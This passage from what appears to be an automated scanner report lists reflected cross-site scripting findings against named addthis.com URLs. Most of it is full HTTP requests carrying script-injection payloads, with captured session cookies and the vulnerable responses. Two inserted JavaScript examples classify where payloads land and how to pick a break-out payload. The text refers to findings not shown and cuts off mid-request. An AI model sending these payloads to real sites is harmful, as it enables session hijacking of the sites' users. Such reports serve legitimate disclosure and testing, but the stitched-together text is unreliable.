Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT2fc54"-alert(1)-"82596acea0f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT2fc54"-alert(1)-"82596acea0f";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.121. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e9c29<script>alert(1)</script>f5118c59dad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMTe9c29<script>alert(1)</script>f5118c59dad HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMTe9c29<script>alert(1)</script>f5118c59dad</strong>
...[SNIP]...

2.122. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ea55f<script>alert(1)</script>15dfb687cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT?ea55f<script>alert(1)</script>15dfb687cb8=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT?ea55f<script>alert(1)</script>15dfb687cb8=1</strong>
...[SNIP]...
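
Every Issue detail in 2.115 through 2.122 rests on the same check: the scanner sends the payload between two random hex markers, finds the markers in the response, compares what came back with what was sent, and works out the syntactic context at that point. The following added example (not code from the report or from Burp Suite, whose internals are not shown here) reimplements that check in JavaScript over response fragments constructed to match the ones captured above, plus two constructed "fixed" variants so the same function shows what an encoded, non-exploitable reflection looks like. The function names and the context labels are this example's own.

```javascript
// Added example: not code from the report or from the scanner that produced
// it. Reproduces the reflection check behind each "Issue detail" above:
// locate the marker pair, compare the echoed bytes with the payload, and
// classify the syntactic context at the point of reflection.

// Classify where in the document a reflection at `index` lands. Covers the
// two contexts seen in this report (HTML text between tags, double-quoted JS
// string) plus the two neighbours a reviewer would want distinguished.
function contextAt(body, index) {
  const before = body.slice(0, index);
  const open = before.lastIndexOf('<script');
  const close = before.lastIndexOf('</script');
  if (open !== -1 && open > close) {
    // Inside an open <script> element: an odd number of unescaped double
    // quotes since the tag means the reflection sits inside a "..." literal.
    const scriptText = before.slice(before.indexOf('>', open) + 1);
    let quotes = 0;
    for (let i = 0; i < scriptText.length; i++) {
      if (scriptText[i] === '\\') { i++; continue; } // skip the escaped char
      if (scriptText[i] === '"') quotes++;
    }
    return quotes % 2 === 1 ? 'js-string-double-quoted' : 'js-code';
  }
  // An unclosed '<' means the reflection is inside a tag (attribute context).
  return before.lastIndexOf('<') > before.lastIndexOf('>') ? 'html-tag' : 'html-text';
}

// Find every marker pair in the response and report what was echoed between
// them, whether it matches the payload byte for byte, and its context.
function findReflections(body, prefix, payload, suffix) {
  const hits = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(prefix, from);
    if (start === -1) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end === -1) break;
    const echoed = body.slice(start + prefix.length, end);
    hits.push({
      index: start,
      echoed,
      unmodified: echoed === payload,
      context: contextAt(body, start + prefix.length),
    });
    from = end + suffix.length;
  }
  return hits;
}

// Response fragments modelled on issues 2.115 and 2.117 above (constructed
// for this example; the tail of each path is shortened).
const VULN_HTML_TEXT =
  '<title>Not found</title>\n' +
  '<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC' +
  '?a2749<script>alert(1)</script>6a4b41f81b3=1</strong>';
const VULN_JS_STRING =
  '<script type="text/javascript">\n' +
  'var u = "/404/servicesad7de"-alert(1)-"5df2828d99b/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT";\n' +
  '</script>';
// Constructed: the same two fragments after context-correct output encoding.
const FIXED_HTML_TEXT = VULN_HTML_TEXT.replace(
  '<script>alert(1)</script>', '&lt;script&gt;alert(1)&lt;/script&gt;');
const FIXED_JS_STRING = VULN_JS_STRING.replace(
  '"-alert(1)-"', '\\"-alert(1)-\\"');

const HTML_PROBE = ['a2749', '<script>alert(1)</script>', '6a4b41f81b3'];
const JS_PROBE = ['ad7de', '"-alert(1)-"', '5df2828d99b'];

function demoReflections() {
  return {
    vulnHtmlText: findReflections(VULN_HTML_TEXT, ...HTML_PROBE),
    vulnJsString: findReflections(VULN_JS_STRING, ...JS_PROBE),
    fixedHtmlText: findReflections(FIXED_HTML_TEXT, ...HTML_PROBE),
    fixedJsString: findReflections(FIXED_JS_STRING, ...JS_PROBE),
  };
}

console.log(demoReflections());
```

The two captured fragments come back as unmodified reflections in the html-text and js-string-double-quoted contexts, which is what the report's "echoed unmodified" and "encapsulated in double quotation marks" wording summarises. The constructed fixed fragments still reflect the markers, so a grep for the payload alone would not tell the cases apart; the unmodified flag and the echoed bytes do. Note that the context test only looks at the markup before the reflection, so a `<script` that is itself part of the injected payload, as in 2.115, is correctly ignored.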

2.123. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ddd0"-alert(1)-"6d181bcf17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services8ddd0"-alert(1)-"6d181bcf17d/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services8ddd0"-alert(1)-"6d181bcf17d/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}

...[SNIP]...

2.124. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 307df<script>alert(1)</script>bd5fc24f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services307df<script>alert(1)</script>bd5fc24f23/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services307df<script>alert(1)</script>bd5fc24f23/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC</strong>
...[SNIP]...

2.125. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db573<script>alert(1)</script>f9e1a86c09d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3Cdb573<script>alert(1)</script>f9e1a86c09d/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3Cdb573<script>alert(1)</script>f9e1a86c09d/script%3EHOYTLLC</strong>
...[SNIP]...

2.126. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81be2"-alert(1)-"71b90c0a1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C81be2"-alert(1)-"71b90c0a1d1/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C81be2"-alert(1)-"71b90c0a1d1/script%3EHOYTLLC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTr
...[SNIP]...

2.127. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38562<script>alert(1)</script>40e45f429b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC38562<script>alert(1)</script>40e45f429b9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC38562<script>alert(1)</script>40e45f429b9</strong>
...[SNIP]...

2.128. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 227f5"-alert(1)-"d6b59968138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
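The two reflection contexts the scanner reports for this 404 page decide which payload fires: the path echoed as plain text inside the <strong> element needs a raw <script> tag, while the copy inside the double-quoted string of var u = "/404/..." only needs a double quote to break out. A 404 status makes no difference; the response is served as text/html and the browser renders it like any other page. The following classifier is an added example, not code from the XSS.CX report or from any scanned site: it finds every copy of a canary in a response body and names the context it landed in, run here over a constructed response modelled on the 404 snippet above and the ask.com _matchUrl line later in the report. The sample body, the CANARY marker and the function names are this example's own assumptions.

```javascript
// Added example (not part of the XSS.CX report): locate a scanner canary in a
// response body and classify the context of each reflection, using the same
// context names the report uses. Handles HTML text, HTML tags, and inside a
// <script> block the JS states that matter for XSS: code, single- and
// double-quoted strings, rest-of-line comments and block comments.
// (Regex and template literals are not modelled; the snippets here have none.)

function classifyReflection(body, canary) {
  const results = [];
  let from = 0;
  for (;;) {
    const at = body.indexOf(canary, from);
    if (at === -1) break;
    from = at + canary.length;
    results.push({ offset: at, context: contextAt(body, at) });
  }
  return results;
}

// Walks the response up to `pos` and returns the context at that point.
function contextAt(body, pos) {
  const prefix = body.slice(0, pos);
  const lower = prefix.toLowerCase();
  const scriptOpen = lower.lastIndexOf("<script");
  const scriptClose = lower.lastIndexOf("</script");
  if (scriptOpen === -1 || scriptClose > scriptOpen) {
    // Outside any <script> block: inside a tag or between tags?
    return prefix.lastIndexOf("<") > prefix.lastIndexOf(">") ? "html-tag" : "html-text";
  }
  // Inside a <script> block: tokenise the JS between the tag's '>' and pos.
  const code = prefix.slice(prefix.indexOf(">", scriptOpen) + 1);
  let state = "code";
  for (let i = 0; i < code.length; i++) {
    const c = code[i], n = code[i + 1];
    if (state === "code") {
      if (c === '"') state = "dq";
      else if (c === "'") state = "sq";
      else if (c === "/" && n === "/") { state = "line-comment"; i++; }
      else if (c === "/" && n === "*") { state = "block-comment"; i++; }
    } else if (state === "dq" || state === "sq") {
      if (c === "\\") i++;                                   // skip escaped char
      else if (c === (state === "dq" ? '"' : "'")) state = "code";
    } else if (state === "line-comment") {
      if (c === "\n" || c === "\r") state = "code";          // a raw newline ends it
    } else if (state === "block-comment") {
      if (c === "*" && n === "/") { state = "code"; i++; }
    }
  }
  return { code: "js-code", dq: "js-string-double", sq: "js-string-single",
           "line-comment": "js-line-comment", "block-comment": "js-block-comment" }[state];
}

// Convenience wrapper: just the context names, in document order.
function reflectionContexts(body, canary) {
  return classifyReflection(body, canary).map(r => r.context);
}

// Constructed sample response (assumption: modelled on the 404 page and the
// ask.com snippet in the report, not captured from either site).
const SAMPLE_RESPONSE = [
  '<html><head><title>Not found</title></head><body>',
  '<a href="/services/submitCANARY">back</a>',
  '<p>The page <strong>services/submitCANARY</strong> was not found.</p>',
  '<script type="text/javascript">',
  'var u = "/404/services/submitCANARY";',
  'if (u.indexOf("?") == -1) { u += "?"; } // CANARY in a comment',
  "var _matchUrl = '/afc-match?q=Ohio&l=CANARY';",
  '</script></body></html>'
].join("\n");
```

Running reflectionContexts(SAMPLE_RESPONSE, "CANARY") yields html-tag, html-text, js-string-double, js-line-comment and js-string-single in that order, which is exactly the set of contexts the addthis.com and ask.com findings in this report fall into; a practitioner would feed it the real response and the random prefix the scanner used, then pick the break-out payload per context.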

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC227f5"-alert(1)-"d6b59968138 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
